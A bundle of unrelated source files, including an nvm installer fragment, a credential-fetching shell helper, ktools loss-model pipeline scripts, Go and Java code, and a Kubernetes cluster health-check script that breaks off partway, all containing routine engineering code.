      echo >&2 "File \"${NVM_DIR}\" has the same name as installation directory."
      exit 1
    fi
    # Only auto-create the directory when it is the default location.
    if [ "${NVM_DIR}" = "$(nvm_default_install_dir)" ]; then
      mkdir "${NVM_DIR}"
    else
      echo >&2 "You have \$NVM_DIR set to \"${NVM_DIR}\", but that directory does not exist. Check your profile files and environment."
      exit 1
    fi
  fi
  # Pick the install method: explicit $METHOD, else git when available,
  # else raw-script download via curl/wget.
  if [ -z "${METHOD}" ]; then
    # Autodetect install method
    if nvm_has git; then
      install_nvm_from_git
    elif nvm_has nvm_download; then
      install_nvm_as_script
    else
      echo >&2 'You need git, curl, or wget to install nvm'
      exit 1
    fi
  elif [ "${METHOD}" = 'git' ]; then
    if ! nvm_has git; then
      echo >&2 "You need git to install nvm"
      exit 1
    fi
    install_nvm_from_git
  elif [ "${METHOD}" = 'script' ]; then
    if ! nvm_has nvm_download; then
      echo >&2 "You need curl or wget to install nvm"
      exit 1
    fi
    install_nvm_as_script
  else
    echo >&2 "The environment variable \$METHOD is set to \"${METHOD}\", which is not recognized as a valid installation method."
    exit 1
  fi
  echo
  local NVM_PROFILE
  NVM_PROFILE="$(nvm_detect_profile)"
  local PROFILE_INSTALL_DIR
  # Re-abbreviate $HOME so the appended profile line stays portable.
  PROFILE_INSTALL_DIR="$(nvm_install_dir | command sed "s:^$HOME:\$HOME:")"
  SOURCE_STR="\\nexport NVM_DIR=\"${PROFILE_INSTALL_DIR}\"\\n[ -s \"\$NVM_DIR/nvm.sh\" ] && \\. \"\$NVM_DIR/nvm.sh\" # This loads nvm\\n"
  # shellcheck disable=SC2016
  COMPLETION_STR='[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion\n'
  BASH_OR_ZSH=false
  if [ -z "${NVM_PROFILE-}" ] ; then
    local TRIED_PROFILE
    if [ -n "${PROFILE}" ]; then
      # BUGFIX: previously interpolated ${NVM_PROFILE}, which is always empty
      # inside this branch, so the message never showed the user's $PROFILE.
      TRIED_PROFILE="${PROFILE} (as defined in \$PROFILE), "
    fi
    echo "=> Profile not found. Tried ${TRIED_PROFILE-}~/.bashrc, ~/.bash_profile, ~/.zshrc, and ~/.profile."
    echo "=> Create one of them and run this script again"
    echo " OR"
    echo "=> Append the following lines to the correct file yourself:"
    command printf "${SOURCE_STR}"
    echo
  else
    if nvm_profile_is_bash_or_zsh "${NVM_PROFILE-}"; then
      BASH_OR_ZSH=true
    fi
    # Only append the source lines once per profile file.
    if ! command grep -qc '/nvm.sh' "$NVM_PROFILE"; then
      echo "=> Appending nvm source string to $NVM_PROFILE"
      command printf "${SOURCE_STR}" >> "$NVM_PROFILE"
    else
      echo "=> nvm source string already in ${NVM_PROFILE}"
    fi
    # shellcheck disable=SC2016
    if ${BASH_OR_ZSH} && ! command grep -qc '$NVM_DIR/bash_completion' "$NVM_PROFILE"; then
      echo "=> Appending bash_completion source string to $NVM_PROFILE"
      command printf "$COMPLETION_STR" >> "$NVM_PROFILE"
    else
      echo "=> bash_completion source string already in ${NVM_PROFILE}"
    fi
  fi
  if ${BASH_OR_ZSH} && [ -z "${NVM_PROFILE-}" ] ; then
    echo "=> Please also append the following lines to the if you are using bash/zsh shell:"
    command printf "${COMPLETION_STR}"
  fi
  # Source nvm
  # shellcheck source=/dev/null
  \. "$(nvm_install_dir)/nvm.sh"
  nvm_check_global_modules
  nvm_install_node
  nvm_reset
  echo "=> Close and reopen your terminal to start using nvm or run the following to use it now:"
  command printf "${SOURCE_STR}"
  if ${BASH_OR_ZSH} ; then
    command printf "${COMPLETION_STR}"
  fi
}
#
# Unsets the various functions defined
# during the execution of the install script
#
# Keeps the user's interactive shell clean after install.sh has been sourced.
nvm_reset() {
  unset -f nvm_has nvm_install_dir nvm_latest_version nvm_profile_is_bash_or_zsh \
    nvm_source nvm_node_version nvm_download install_nvm_from_git nvm_install_node \
    install_nvm_as_script nvm_try_profile nvm_detect_profile nvm_check_global_modules \
    nvm_do_install nvm_reset nvm_default_install_dir
}
[ "_$NVM_ENV" = "_testing" ] || nvm_do_install
} # this ensures the entire script is downloaded #
|
#!/usr/bin/env bash
# Fetch temporary AWS S3 credentials from Vertica, export them into the
# current shell, then remove every file that holds secrets.
# NOTE(review): the script sources aws-credentials.sh, so the exported AWS
# variables only persist if this script is itself sourced — confirm usage.

# Source your vertica credentials
if [ -f .Renviron ]
then
  source .Renviron
fi

# Generate vertica.ini from environment variables
cat << EOM > vertica.ini
[DEFAULT]
host=$vertica_host
port=$vertica_port
database=advana
user=$vertica_user
password=$vertica_password
EOM
# The file contains a password: restrict it to the current user before
# handing it to any other tool.
chmod 600 vertica.ini

# Get aws s3 credentials from Vertica
# Install this tool with the following command:
# pip install git+ssh://git@github.com/massmutual/set-aws-credentials
if ! set-aws-credentials vertica.ini data-scientist; then
  echo "set-aws-credentials failed; removing vertica.ini" >&2
  rm -f -- vertica.ini
  # `return` works when sourced; `exit` when executed directly.
  return 1 2>/dev/null || exit 1
fi

# Source aws-credentials then remove them and vertica.ini
source ./aws-credentials.sh
rm -f -- aws-credentials.sh vertica.ini
|
import re
def calculate_total_stars(typescript_snippet):
    """Return the star count parsed from a ``<gh_stars>N`` tag in the snippet.

    ``export * from '...';`` lines are additionally scanned for a trailing
    integer, which would be added to the total (in practice those matches end
    with ``;``, so they never contribute).
    """
    total = 0

    # File-level star tag, e.g. "<gh_stars>42".
    tag = re.search(r'<gh_stars>(\d+)', typescript_snippet)
    if tag is not None:
        total = int(tag.group(1))

    # Per-module scan, kept for parity with the original behaviour.
    for export_line in re.findall(r'export \* from .+?;', typescript_snippet):
        trailing = re.search(r'(\d+)$', export_line)
        if trailing is not None:
            total += int(trailing.group(1))

    return total
# Sample input mirroring a scraped TypeScript "public API surface" file,
# with the repository star count embedded as a <gh_stars> tag.
typescript_snippet = """
<gh_stars>0
/*
* Public API Surface of pdbloader
*/
export * from './lib/main';
export * from './lib/loaderPDB.module';
export * from './lib/PDBLoader';
"""
print(calculate_total_stars(typescript_snippet)) # Output: 0 (sum of all stars)
#!/usr/bin/env -S bash -euET -o pipefail -O inherit_errexit
# Oasis LMF worker script (chunk P5): wires ktools processes together with
# FIFOs to compute ground-up (gul) and insured (il) losses for event set 5.
# %FIFO_DIR% is a placeholder substituted by the run orchestrator.

# cd to the directory containing this script; the command substitution is
# quoted so paths containing spaces do not word-split under `set -u`.
SCRIPT=$(readlink -f "$0") && cd "$(dirname "$SCRIPT")"

# --- Script Init ---
mkdir -p log
rm -R -f log/*

# --- Setup run dirs ---
find output -type f -not -name '*summary-info*' -not -name '*.json' -exec rm -R -f {} +
rm -R -f /tmp/%FIFO_DIR%/fifo/*
rm -R -f work/*
mkdir work/kat/
mkdir work/gul_S1_summaryleccalc
mkdir work/gul_S1_summaryaalcalc
mkdir work/il_S1_summaryleccalc
mkdir work/il_S1_summaryaalcalc

# FIFOs connecting the producer (gulcalc/fmcalc) to the summary consumers.
mkfifo /tmp/%FIFO_DIR%/fifo/gul_P5
mkfifo /tmp/%FIFO_DIR%/fifo/gul_S1_summary_P5
mkfifo /tmp/%FIFO_DIR%/fifo/gul_S1_summary_P5.idx
mkfifo /tmp/%FIFO_DIR%/fifo/gul_S1_eltcalc_P5
mkfifo /tmp/%FIFO_DIR%/fifo/gul_S1_summarycalc_P5
mkfifo /tmp/%FIFO_DIR%/fifo/gul_S1_pltcalc_P5
mkfifo /tmp/%FIFO_DIR%/fifo/il_P5
mkfifo /tmp/%FIFO_DIR%/fifo/il_S1_summary_P5
mkfifo /tmp/%FIFO_DIR%/fifo/il_S1_summary_P5.idx
mkfifo /tmp/%FIFO_DIR%/fifo/il_S1_eltcalc_P5
mkfifo /tmp/%FIFO_DIR%/fifo/il_S1_summarycalc_P5
mkfifo /tmp/%FIFO_DIR%/fifo/il_S1_pltcalc_P5

# --- Do insured loss computes ---
eltcalc -s < /tmp/%FIFO_DIR%/fifo/il_S1_eltcalc_P5 > work/kat/il_S1_eltcalc_P5 & pid1=$!
summarycalctocsv -s < /tmp/%FIFO_DIR%/fifo/il_S1_summarycalc_P5 > work/kat/il_S1_summarycalc_P5 & pid2=$!
pltcalc -s < /tmp/%FIFO_DIR%/fifo/il_S1_pltcalc_P5 > work/kat/il_S1_pltcalc_P5 & pid3=$!
# tee fans the summary stream out to the per-metric FIFOs and the aal/lec work files.
tee < /tmp/%FIFO_DIR%/fifo/il_S1_summary_P5 /tmp/%FIFO_DIR%/fifo/il_S1_eltcalc_P5 /tmp/%FIFO_DIR%/fifo/il_S1_summarycalc_P5 /tmp/%FIFO_DIR%/fifo/il_S1_pltcalc_P5 work/il_S1_summaryaalcalc/P5.bin work/il_S1_summaryleccalc/P5.bin > /dev/null & pid4=$!
tee < /tmp/%FIFO_DIR%/fifo/il_S1_summary_P5.idx work/il_S1_summaryleccalc/P5.idx > /dev/null & pid5=$!
summarycalc -m -f -1 /tmp/%FIFO_DIR%/fifo/il_S1_summary_P5 < /tmp/%FIFO_DIR%/fifo/il_P5 &

# --- Do ground up loss computes ---
eltcalc -s < /tmp/%FIFO_DIR%/fifo/gul_S1_eltcalc_P5 > work/kat/gul_S1_eltcalc_P5 & pid6=$!
summarycalctocsv -s < /tmp/%FIFO_DIR%/fifo/gul_S1_summarycalc_P5 > work/kat/gul_S1_summarycalc_P5 & pid7=$!
pltcalc -s < /tmp/%FIFO_DIR%/fifo/gul_S1_pltcalc_P5 > work/kat/gul_S1_pltcalc_P5 & pid8=$!
tee < /tmp/%FIFO_DIR%/fifo/gul_S1_summary_P5 /tmp/%FIFO_DIR%/fifo/gul_S1_eltcalc_P5 /tmp/%FIFO_DIR%/fifo/gul_S1_summarycalc_P5 /tmp/%FIFO_DIR%/fifo/gul_S1_pltcalc_P5 work/gul_S1_summaryaalcalc/P5.bin work/gul_S1_summaryleccalc/P5.bin > /dev/null & pid9=$!
tee < /tmp/%FIFO_DIR%/fifo/gul_S1_summary_P5.idx work/gul_S1_summaryleccalc/P5.idx > /dev/null & pid10=$!
summarycalc -m -i -1 /tmp/%FIFO_DIR%/fifo/gul_S1_summary_P5 < /tmp/%FIFO_DIR%/fifo/gul_P5 &

# Event producer: gul stream is tee'd both to the gul pipeline and through
# fmcalc into the il pipeline.
eve 5 40 | getmodel | gulcalc -S100 -L100 -r -a1 -i - | tee /tmp/%FIFO_DIR%/fifo/gul_P5 | fmcalc -a2 > /tmp/%FIFO_DIR%/fifo/il_P5 &

wait $pid1 $pid2 $pid3 $pid4 $pid5 $pid6 $pid7 $pid8 $pid9 $pid10

# --- Do insured loss kats ---
kat -s work/kat/il_S1_eltcalc_P5 > output/il_S1_eltcalc.csv & kpid1=$!
kat work/kat/il_S1_pltcalc_P5 > output/il_S1_pltcalc.csv & kpid2=$!
kat work/kat/il_S1_summarycalc_P5 > output/il_S1_summarycalc.csv & kpid3=$!

# --- Do ground up loss kats ---
kat -s work/kat/gul_S1_eltcalc_P5 > output/gul_S1_eltcalc.csv & kpid4=$!
kat work/kat/gul_S1_pltcalc_P5 > output/gul_S1_pltcalc.csv & kpid5=$!
kat work/kat/gul_S1_summarycalc_P5 > output/gul_S1_summarycalc.csv & kpid6=$!
wait $kpid1 $kpid2 $kpid3 $kpid4 $kpid5 $kpid6
|
/*
* Tencent is pleased to support the open source community by making 蓝鲸 available.,
* Copyright (C) 2017-2018 THL A29 Limited, a Tencent company. All rights reserved.
* Licensed under the MIT License (the ",License",); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an ",AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*/
package model_test
import (
"testing"
"configcenter/src/common/mapstr"
"configcenter/src/common/metadata"
"github.com/rs/xid"
"github.com/stretchr/testify/require"
)
// TestManagerModelAttributeGroup exercises the full attribute-group CRUD
// cycle (create / search / update / delete) against a freshly created model.
func TestManagerModelAttributeGroup(t *testing.T) {
	modelMgr := newModel(t)
	inputModel := metadata.CreateModel{}
	// create a valid model with a valid classificationID
	classificationID := xid.New().String()
	result, err := modelMgr.CreateOneModelClassification(defaultCtx, metadata.CreateOneModelClassification{
		Data: metadata.Classification{
			ClassificationID:   classificationID,
			ClassificationName: "test_classification_name_to_test_create_model",
		},
	})
	require.NoError(t, err)
	require.NotEqual(t, uint64(0), result.Created.ID)
	// xid yields a unique ObjectID per run so concurrent tests don't collide
	inputModel.Spec.ObjCls = classificationID
	inputModel.Spec.ObjectName = "delete_create_model"
	inputModel.Spec.ObjectID = xid.New().String()
	inputModel.Attributes = []metadata.Attribute{
		metadata.Attribute{
			ObjectID:     inputModel.Spec.ObjectID,
			PropertyID:   xid.New().String(),
			PropertyName: xid.New().String(),
		},
	}
	dataResult, err := modelMgr.CreateModel(defaultCtx, inputModel)
	require.NoError(t, err)
	require.NotNil(t, dataResult)
	require.NotEqual(t, uint64(0), dataResult.Created.ID)
	// create attribute group
	groupID := xid.New().String()
	createGrpResult, err := modelMgr.CreateModelAttributeGroup(defaultCtx, inputModel.Spec.ObjectID, metadata.CreateModelAttributeGroup{
		Data: metadata.Group{
			ObjectID:  inputModel.Spec.ObjectID,
			GroupID:   groupID,
			GroupName: "create_group_test",
		},
	})
	require.NoError(t, err)
	require.NotNil(t, createGrpResult)
	// query attribute group — expect exactly the one group just created
	searchGrpResult, err := modelMgr.SearchModelAttributeGroup(defaultCtx, inputModel.Spec.ObjectID, metadata.QueryCondition{
		Condition: mapstr.MapStr{
			metadata.GroupFieldGroupID: groupID,
		},
	})
	require.NoError(t, err)
	require.NotNil(t, searchGrpResult)
	require.Equal(t, int64(1), searchGrpResult.Count)
	require.Equal(t, 1, len(searchGrpResult.Info))
	require.Equal(t, groupID, searchGrpResult.Info[0].GroupID)
	t.Logf("search grp:%v", searchGrpResult)
	// update attribute group — rename it and expect one row affected
	updateGrpResult, err := modelMgr.UpdateModelAttributeGroup(defaultCtx, inputModel.Spec.ObjectID, metadata.UpdateOption{
		Data: mapstr.MapStr{
			metadata.GroupFieldGroupName: "update_test_group",
		},
		Condition: mapstr.MapStr{
			metadata.GroupFieldGroupID: groupID,
		},
	})
	require.NoError(t, err)
	require.NotNil(t, updateGrpResult)
	require.Equal(t, uint64(1), updateGrpResult.Count)
	// delete attribute group — expect one row affected
	deleteGrpResult, err := modelMgr.DeleteModelAttributeGroup(defaultCtx, inputModel.Spec.ObjectID, metadata.DeleteOption{
		Condition: mapstr.MapStr{
			metadata.GroupFieldGroupID: groupID,
		},
	})
	require.NoError(t, err)
	require.NotNil(t, deleteGrpResult)
	require.Equal(t, uint64(1), deleteGrpResult.Count)
}
|
<filename>scroll.js
//scrolling function. linking menu list to relevant content
$(document).ready(function() {
  // Map each menu entry to the content section it should scroll to.
  var sectionByMenuItem = [
    { menu: '#postOne', target: '#Lean' },
    { menu: '#postTwo', target: '#Agila-metoder' },
    { menu: '#postThree', target: '#Projektmetodiken' }
  ];
  // Attach one click handler per menu entry (same handlers, same order as
  // the original three copy-pasted blocks).
  sectionByMenuItem.forEach(function(link) {
    $(link.menu).click(function() {
      // Smoothly scroll the page to the linked section over 2 seconds.
      $('html, body').animate({
        scrollTop: $(link.target).offset().top
      }, 2000);
    });
  });
});
|
package br.com.papyrus.controller;
import javax.swing.text.AttributeSet;
import javax.swing.text.BadLocationException;
import javax.swing.text.PlainDocument;
public class StringLimitada extends PlainDocument {
    // Maximum number of characters the document accepts (default 10).
    private int tamanhoMax = 10;

    /**
     *
     * Document model for a JTextField that restricts how many characters the
     * field may contain.
     *
     * @author Taken from the GUJ forum
     * @param tamanhoMax the maximum number of characters the field may hold
     */
    public StringLimitada(int tamanhoMax) {
        this.tamanhoMax = tamanhoMax;
    }

    /**
     * Inserts the given text only when the resulting document length stays
     * within {@code tamanhoMax}; otherwise the insertion is ignored.
     */
    @Override
    public void insertString(int offset, String str, AttributeSet attr) throws BadLocationException {
        if (str == null) {
            return;
        }
        String stringAntiga = getText(0, getLength());
        int tamanhoNovo = stringAntiga.length() + str.length();
        if (tamanhoNovo <= tamanhoMax) {
            super.insertString(offset, str, attr);
        } else {
            // inserting the empty string is effectively a no-op rejection
            super.insertString(offset, "", attr);
        }
    }
}
|
<filename>cmd/restore_test.go<gh_stars>1-10
package cmd_test
import (
"fmt"
"math/rand"
"os"
"testing"
"time"
"github.com/lvnacapital/algorand-go/cmd"
)
// TestRestore recreates a wallet from a mnemonic via the `restore` command.
// A random numeric suffix keeps wallet names unique across runs; the test
// returns early in CI when no Algorand kmd node is reachable.
func TestRestore(t *testing.T) {
	if os.Getenv("CI") == "true" && !kmdAvailable {
		// No Algorand node available
		return
	}
	s1 := rand.NewSource(time.Now().UnixNano())
	r1 := rand.New(s1)
	cmd.WalletName = walletName
	got, err := executeCommand(cmd.AlgorandCmd, "restore", "-w", fmt.Sprintf("%s-%d", walletName, r1.Intn(1000000000)), "-p", walletPassword, "-m", mnemonic)
	// Empty output is tolerated; any non-empty output must be the exact
	// success message.
	if got != "" {
		expected := "Created wallet successfully."
		if got != expected {
			t.Errorf("Unexpected output - %v", got)
		}
	}
	if err != nil {
		t.Errorf("Unexpected error - %v", err)
	}
}
|
# frozen_string_literal: true

# Whenever (cron) schedule: refresh the Redis cache every hour.
set :bundle_command, '/usr/local/bin/bundle exec' # absolute path so cron's minimal PATH still finds bundler
set :output, 'log/rake.log' # cron job stdout/stderr log
set :chronic_options, hours24: true # parse schedule times as 24-hour clock
# NOTE(review): :environment_variable/:environment here repurpose whenever's
# Rails-env setting to emit REDIS_URL=redis://... into the crontab line —
# confirm this is intentional rather than a misunderstanding of :environment.
set :environment_variable, 'REDIS_URL'
set :environment, 'redis://localhost:6379/0'

every 1.hour do
  rake 'redis:populate'
end
|
/**
*/
package edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel;
import edu.kit.ipd.sdq.kamp4iec.model.IECRepository.FunctionBlock;
import edu.kit.ipd.sdq.kamp4iec.model.IECRepository.IsMethod;
import org.eclipse.emf.common.util.EList;
import org.eclipse.emf.ecore.EObject;
/**
 * <!-- begin-user-doc -->
 * A representation of the model object '<em><b>Mode</b></em>'.
 *
 * A named HMI mode that references the IEC function blocks and methods it
 * is associated with.
 * <!-- end-user-doc -->
 *
 * <p>
 * The following features are supported:
 * </p>
 * <ul>
 *   <li>{@link edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Mode#getAffectedFunctionBlocks <em>Affected Function Blocks</em>}</li>
 *   <li>{@link edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Mode#getAffectedMethods <em>Affected Methods</em>}</li>
 *   <li>{@link edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Mode#getName <em>Name</em>}</li>
 * </ul>
 *
 * @see edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Kamp4hmiModelPackage#getMode()
 * @model
 * @generated
 */
public interface Mode extends EObject {
	/**
	 * Returns the value of the '<em><b>Affected Function Blocks</b></em>' reference list.
	 * The list contents are of type {@link edu.kit.ipd.sdq.kamp4iec.model.IECRepository.FunctionBlock}.
	 * <!-- begin-user-doc -->
	 * <p>
	 * The IEC function blocks referenced by this mode.
	 * </p>
	 * <!-- end-user-doc -->
	 * @return the value of the '<em>Affected Function Blocks</em>' reference list.
	 * @see edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Kamp4hmiModelPackage#getMode_AffectedFunctionBlocks()
	 * @model
	 * @generated
	 */
	EList<FunctionBlock> getAffectedFunctionBlocks();

	/**
	 * Returns the value of the '<em><b>Affected Methods</b></em>' reference list.
	 * The list contents are of type {@link edu.kit.ipd.sdq.kamp4iec.model.IECRepository.IsMethod}.
	 * <!-- begin-user-doc -->
	 * <p>
	 * The IEC methods referenced by this mode.
	 * </p>
	 * <!-- end-user-doc -->
	 * @return the value of the '<em>Affected Methods</em>' reference list.
	 * @see edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Kamp4hmiModelPackage#getMode_AffectedMethods()
	 * @model
	 * @generated
	 */
	EList<IsMethod> getAffectedMethods();

	/**
	 * Returns the value of the '<em><b>Name</b></em>' attribute.
	 * <!-- begin-user-doc -->
	 * <p>
	 * The human-readable name of this mode.
	 * </p>
	 * <!-- end-user-doc -->
	 * @return the value of the '<em>Name</em>' attribute.
	 * @see #setName(String)
	 * @see edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Kamp4hmiModelPackage#getMode_Name()
	 * @model
	 * @generated
	 */
	String getName();

	/**
	 * Sets the value of the '{@link edu.kit.ipd.sdq.kamp4hmi.model.Kamp4hmiModel.Mode#getName <em>Name</em>}' attribute.
	 * <!-- begin-user-doc -->
	 * <!-- end-user-doc -->
	 * @param value the new value of the '<em>Name</em>' attribute.
	 * @see #getName()
	 * @generated
	 */
	void setName(String value);
} // Mode
|
#!/bin/bash
:<<EOF
@author:fjg
@license: Apache Licence
@file: check_k8s.sh
@time: 2020/12/24
@contact: fujiangong.fujg@bytedance.com
@site:
@software: PyCharm
EOF
# --- Tunables --------------------------------------------------------------
# Restart count above which a kube-system pod is reported as faulty.
podRestartCheckNum=20
# Alert threshold (percent) for cluster resource requests.
clusterRequestCheckPercent=80
# Label selector for the node group whose capacity is sampled.
nodeLabel="sfke.role.kubernetes.io/group=general-worker"
#nodeLabel="kubernetes.io/os=linux"
# Image for the throwaway DNS-probe pod.
busyboxImage="cloudpricicd.sf-express.com/docker-k8sprivate-local/busybox:latest"
#busyboxImage="busybox:1.28.0"
# Scratch directory for the snapshot files written by get_check_data.
healthCheckDir="/tmp/healthCheck"
# Domains resolved from the node (external) and from inside a pod (internal).
externalDomain=("www.sf-express.com")
internalDomain=("kubernetes.default" "kube-dns.kube-system.svc.cluster.local" "www.sf-express.com")
# Pod states tallied by check_pods_status.
podStatusCheck=("Running" "Completed" "CrashLoopBackOff" "ImagePullBackOff" "ContainerCreating" "Terminating" "ERROR")
# Probe pod name is tied to this machine and date so reruns reuse it.
machineId=$(cat /etc/machine-id)
tmpPodName="check-pod-$machineId-$(date +%F)"
export KUBECONFIG="/etc/kubernetes/admin.conf"
export PATH="/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin"
if [ ! -d "$healthCheckDir" ]; then
  mkdir -p "$healthCheckDir"
fi
# Ensure the throwaway probe pod ($tmpPodName) exists and reaches Running,
# polling up to ~10 times. Emits one JSON status line; on failure the pod is
# force-deleted and the whole script aborts (exit 1), since the later
# pod-based checks would be meaningless.
check_check_pod(){
  if ! kubectl get pods "$tmpPodName" --no-headers >& /dev/null;then
    kubectl run "$tmpPodName" --image="$busyboxImage" --restart='Never' -- sleep 1h >& /dev/null
    sleep 10s
  fi
  local podNum=$(kubectl get pods "$tmpPodName"|grep -c Running)
  local checkTime=10
  local checked=0
  # NOTE(review): `local` inside the loop re-declares podNum each pass, and
  # the status is rechecked before the sleep — works, but worth tidying.
  while [[ "$podNum" -ne 1 ]]&&[[ "$checked" -lt $checkTime ]] ;do
    local podNum=$(kubectl get pods "$tmpPodName"|grep -c Running)
    sleep 2s
    checked=$((checked+1))
  done
  if [[ "$podNum" -ne 1 ]]&&[[ "$checked" -eq "$checkTime" ]];then
    echo '{"alert_status":"error","check_point":"check_pod_status","check_data":""}'
    kubectl delete pods "$tmpPodName" --force >& /dev/null
    exit 1
  else
    echo '{"alert_status":"info","check_point":"check_pod_status","check_data":""}'
  fi
}
# Snapshot cluster state (nodes, pods, services, weave pods) into text files
# under $healthCheckDir for the subsequent check_* functions to parse.
# All expansions are quoted (the original left several file paths unquoted,
# SC2086); file-name globals are intentionally left global for the callers.
get_check_data() {
  allNodeFile="$healthCheckDir/allNodeList.txt"
  kubectl get nodes --no-headers -owide >& "$allNodeFile"
  nodeIpFile="$healthCheckDir/nodeIpList.txt"
  # Column 6 of `get nodes -owide` output is the node internal IP.
  awk '{print $6}' "$allNodeFile" > "$nodeIpFile"
  nodeCapacityFile="$healthCheckDir/nodeCapacity.txt"
  kubectl get nodes -o custom-columns=NAME:.metadata.name,CPU:.status.capacity.cpu,MEM:.status.capacity.memory,IP:.status.addresses[0].address --no-headers --selector "$nodeLabel" > "$nodeCapacityFile"
  allPodsFile="$healthCheckDir/allPodList.txt"
  kubectl get pods --all-namespaces --no-headers -owide >& "$allPodsFile"
  allPodIpFile="$healthCheckDir/allPodIpList.txt"
  # Pending pods report "<none>" as their IP; drop those (case-insensitive).
  awk '{print $7}' "$allPodsFile" | grep -iv none | sort | uniq > "$allPodIpFile"
  nsPodIpFile="$healthCheckDir/nsPodIpList.txt"
  grep kube-system "$allPodsFile" | awk '{print $7}' | grep -iv none | sort | uniq > "$nsPodIpFile"
  allServiceFile="$healthCheckDir/allServiceList.txt"
  kubectl get svc --all-namespaces --no-headers -owide >& "$allServiceFile"
  svcListFile="$healthCheckDir/nsSvcList.txt"
  kubectl get svc -oyaml -o=custom-columns=NAME:.metadata.name,CLUSTER-IP:.spec.clusterIP,PORT:.spec.ports[0].port --no-headers -n kube-system | grep -iv none > "$svcListFile"
  weavePodsFile="$healthCheckDir/weavePodsList.txt"
  kubectl get pods -n kube-system -l name=weave-net -o wide --no-headers > "$weavePodsFile"
}
# Verify the kube-system coredns Deployment replica health.
#   error:   zero available or zero ready replicas
#   warning: available or ready lags the desired replica count
#   info:    fully available and ready
check_coredns_replicas(){
  local availableReplicas readyReplicas replicas ready
  read -r availableReplicas ready <<< "$(kubectl -n kube-system get deployments.apps coredns --no-headers|awk '{print $4,$2}')"
  read -r readyReplicas replicas <<< "$(echo "$ready"|awk -F '/' '{print $1,$2}')"
  if [[ "$availableReplicas" -eq 0 ]]||[[ "$readyReplicas" -eq 0 ]];then
    echo '{"alert_status":"error","check_point":"coredns_replicas","check_data":{"availableReplicas":"'"${availableReplicas}"'","readyReplicas":"'"$readyReplicas"'","replicas":"'"$replicas"'"}}'
  # BUGFIX: was `&&`, which required BOTH counts to lag before warning, so a
  # deployment with e.g. 2/3 ready but 3 available was wrongly reported info.
  elif [[ "$availableReplicas" -ne "$replicas" ]]||[[ "$readyReplicas" -ne "$replicas" ]];then
    echo '{"alert_status":"warning","check_point":"coredns_replicas","check_data":{"availableReplicas":"'"$availableReplicas"'","readyReplicas":"'"$readyReplicas"'","replicas":"'"$replicas"'"}}'
  else
    echo '{"alert_status":"info","check_point":"coredns_replicas","check_data":{"availableReplicas":"'"$availableReplicas"'","readyReplicas":"'"$readyReplicas"'","replicas":"'"$replicas"'"}}'
  fi
}
# '{"alert_status":"","check_point":"","check_data":""}'
# Emit one JSON status line for resolving domain $1 from this node via `host`.
dns_check(){
  local domain="$1"
  local status="info"
  if ! host "$domain" >/dev/null; then
    status="error"
  fi
  echo '{"alert_status":"'"$status"'","check_point":"node_dns","check_data":"'"$domain"'"}'
}
# Resolve each configured external domain from the node itself via dns_check.
check_node_dns() {
  for domain in "${externalDomain[@]}";do
    dns_check "$domain"
  done
}
# Resolve cluster-internal and external domains from inside the probe pod
# ($tmpPodName) via nslookup, emitting one JSON status line per domain.
check_pod_dns(){
  # Internal first, then external — same order and output as the previous
  # two copy-pasted loops, now deduplicated into one.
  for domain in "${internalDomain[@]}" "${externalDomain[@]}";do
    if kubectl exec "$tmpPodName" -- nslookup "$domain" >& /dev/null;then
      echo '{"alert_status":"info","check_point":"pod_dns","check_data":"'"$domain"'"}'
    else
      echo '{"alert_status":"error","check_point":"pod_dns","check_data":"'"$domain"'"}'
    fi
  done
}
# Aggregate DNS health: make sure the probe pod is up, then resolve the
# configured domains from inside it. The node-level check is disabled.
check_dns(){
  #check_node_dns
  check_check_pod
  check_pod_dns
}
# Report node readiness from $allNodeFile (`kubectl get nodes --no-headers`
# rows: NAME STATUS ROLES AGE VERSION). Emits an error JSON line plus the
# offending rows when any node is NotReady, otherwise one info line.
check_node_status(){
local availableNode=$(wc -l "$allNodeFile"|awk '{print $1}')
# BUGFIX: match "NotReady" explicitly. The previous `grep -cv Ready` never
# counted NotReady nodes because the string "NotReady" itself contains
# "Ready", so notReadyNodeNum was always 0 and readyNodeNum over-counted.
local notReadyNodeNum=$(grep -c NotReady "$allNodeFile")
local readyNodeNum=$((availableNode - notReadyNodeNum))
if [[ "$notReadyNodeNum" -ne 0 ]];then
local notReadyNode=$(grep NotReady "$allNodeFile")
echo '{"alert_status":"error","check_point":"node_status","check_data":{"readyNodeNum":"'"$readyNodeNum"'","notReadyNodeNum":"'"$notReadyNodeNum"'","availableNode":"'"$availableNode"'"}}'
echo "$notReadyNode"
else
echo '{"alert_status":"info","check_point":"node_status","check_data":{"readyNodeNum":"'"$readyNodeNum"'","notReadyNodeNum":"'"$notReadyNodeNum"'","availableNode":"'"$availableNode"'"}}'
fi
}
# Scan kube-system rows of $allPodsFile (`kubectl get pods -A` output:
# NAMESPACE NAME READY STATUS RESTARTS AGE ...) and emit one JSON line per
# configured status in $podStatusCheck, plus one for pods restarted more than
# $podRestartCheckNum times. Offending pod rows are echoed after the alert.
check_pods_status(){
  local status matchCount restartedCount
  for status in "${podStatusCheck[@]}";do
    matchCount=$(awk -v podStatus="$status" 'BEGIN{count=0}{if($1=="kube-system" && $4==podStatus)count++}END{print count}' "$allPodsFile")
    case "$status" in
      Running|Completed)
        # Healthy statuses are always reported as info, even with count 0.
        echo '{"alert_status":"info","check_point":"pod_status","check_data":{"status":"'"$status"'","num":"'"$matchCount"'"}}'
        ;;
      *)
        # Any other tracked status is an error when at least one pod matches.
        if [[ "$matchCount" -ne 0 ]];then
          echo '{"alert_status":"error","check_point":"pod_status","check_data":{"status":"'"$status"'","num":"'"$matchCount"'"}}'
